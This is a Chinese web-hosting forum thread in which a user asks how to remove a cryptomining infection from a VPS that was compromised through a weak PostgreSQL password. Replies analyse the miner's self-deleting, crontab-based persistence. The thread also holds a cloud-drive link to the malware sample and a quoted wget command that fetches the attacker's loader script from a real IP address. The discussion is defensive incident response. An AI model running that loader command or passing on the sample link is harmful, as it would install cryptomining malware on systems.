全球主机交流论坛

标题: 小鸡中挖矿病毒怎么解决 [打印本页]

---

作者: rwind    时间: 2021-6-11 20:20
标题: 小鸡中挖矿病毒怎么解决
Tasks:  98 total,   3 running,  95 sleeping,   0 stopped,   0 zombie
%Cpu(s): 90.7 us,  9.1 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.2 si,  0.0 st
MiB Mem :   2010.9 total,   1161.1 free,    780.8 used,     69.0 buff/cache
MiB Swap:   2048.0 total,   1973.2 free,     74.8 used.   1116.3 avail Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
11841 postgres  20   0  672620 270984   2604 S 270.3  13.2  53:01.32 [kthreaddi]
4559 postgres  20   0 1476256  83208      4 S  26.7   4.0   5:47.37 nqig1s5p
  419 root      20   0    6432   1764   1576 S   0.3   0.1   8:30.45 qemu-ga
16214 root      20   0    6644   3236   2988 S   0.3   0.2   0:01.61 bash
16965 postgres  20   0   11080   3516   2940 R   0.3   0.2   0:00.90 top
27960 root      20   0   16948   5388   3960 R   0.3   0.3   0:10.89 sshd
    1 root      20   0  170520   5336   3612 S   0.0   0.3   0:12.64 systemd
    2 root      20   0       0      0      0 S   0.0   0.0   0:00.02 kthreadd
    3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp
    4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par_gp

kill 掉进程也不行
定时任务删了又添加定时任务运行


除了重装还能怎么解决

---

作者: h20    时间: 2021-6-11 20:23
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: cancan    时间: 2021-6-11 20:24
怎么中的 我想会会这个病毒。

---

作者: 冲浪麦浪花郎    时间: 2021-6-11 20:26
systemd

---

作者: rwind    时间: 2021-6-11 20:26

cancan 发表于 2021-6-11 20:24
怎么中的 我想会会这个病毒。

postgresql 数据库 弱密码

---

作者: rwind    时间: 2021-6-11 20:27

h20 发表于 2021-6-11 20:23
除了重装还是重装

h20 上班了 永远第一膜拜

---

作者: gyjys43043    时间: 2021-6-11 20:29


应该是有rootkit驻留

需要上传这个挖矿程序，导出给内存镜像发出来研究下

这个是内存导出工具
https://github.com/microsoft/avml

---

作者: rwind    时间: 2021-6-11 20:49

gyjys43043 发表于 2021-6-11 20:29
应该是有rootkit驻留

需要上传这个挖矿程序，导出给内存镜像发出来研究下

暂时好像解决

postgres  4559 14.1  4.6 1476256 94904 ?       Sl   07:39   6:17 /var/lib/postgresql/11/main/pg_dynshmem/nqig1s5p
这个进程好像是守护进程。。我先去备份业务数据先

---

作者: KuYeHQ    时间: 2021-6-11 20:51
重装吧，我弱密码被破解了，挖矿进程都找不到，卡的一批

---

作者: gyjys43043    时间: 2021-6-11 21:31

rwind 发表于 2021-6-11 20:49
暂时好像解决

postgres  4559 14.1  4.6 1476256 94904 ?       Sl   07:39   6:17 /var/lib/postgresql ...

挖矿程序发出来给大家研究下呗

---

作者: rwind    时间: 2021-6-11 21:55

gyjys43043 发表于 2021-6-11 21:31
挖矿程序发出来给大家研究下呗

https://cloud.189.cn/t/AR7bUbaQNbMj (访问码:7mb0)
还在找，这应该是一个因为账号权限不高我看看破坏哪些文件了

---

作者: gyjys43043    时间: 2021-6-12 00:04

rwind 发表于 2021-6-11 21:55
https://cloud.189.cn/t/AR7bUbaQNbMj (访问码:7mb0)
还在找，这应该是一个因为账号权限不高我看看破坏哪 ...

这程序有点意思，居然还对cpu超频

sh -c "/sbin/modprobe msr > /dev/null 2>&1"

---

作者: 天权璇玑    时间: 2021-6-12 00:13
重装系统

---

作者: dole    时间: 2021-6-12 00:39
备份重要文件 直接dd

---

作者: gyjys43043    时间: 2021-6-12 10:57


这个挖矿程序的原理是
1. 会创建两个进程，一个主进程一个守护进程，并且运行后会立刻删掉磁盘上的文件
2. 任何一个进程被杀掉后，另外一个进程会立刻将自己重命名成一个随机的名字，并保存到一个随机文件夹下
3. 同时将刚保存的新文件路径写入到crontab中
以上就实现了循环启动

要杀掉它也很简单，并写脚本同时杀掉两个进程,并读取crontab然后删除那个随机文件

---

作者: rwind    时间: 2021-6-12 14:26

gyjys43043 发表于 2021-6-12 10:57
这个挖矿程序的原理是
1. 会创建两个进程，一个主进程一个守护进程，并且运行后会立刻删掉磁盘上的文件
2.  ...

昨天随便看了一下
wget --user-agent e39dc295 -q -O - 194.145.227.21/ldr.sh
这脚本基本把思路是这样

---

欢迎光临 全球主机交流论坛 (https://hostloc.9hanju.com/)

Powered by Discuz! X3.4